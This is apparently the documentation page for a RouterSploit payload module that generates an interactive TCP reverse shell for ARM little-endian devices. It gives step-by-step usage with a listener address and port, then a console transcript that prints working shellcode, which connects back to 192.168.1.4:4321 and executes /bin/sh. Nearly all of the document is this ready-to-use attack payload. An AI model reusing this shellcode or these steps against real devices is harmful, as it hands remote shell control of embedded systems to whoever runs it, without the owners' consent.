## Description Module generates payload that creates interactive tcp reverse shell for ARMLE architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/armle/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Module generates armle reverse shell tcp payload ## Scenarios ``` rsf > rsf > use payloads/armle/reverse_tcp rsf (ARMLE Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (ARMLE Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (ARMLE Reverse TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\x0f" "\x02\x19\x37\x01\xdf\x06\x1c\x08\xa1\x10\x22\x02\x37\x01\xdf" "\x3f\x27\x02\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x05\xa0\x92" "\x1a\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\x00\x10\xe1" "\xc0\xa8\x01\x04\x2f\x62\x69\x6e\x2f\x73\x68\x00" ) ```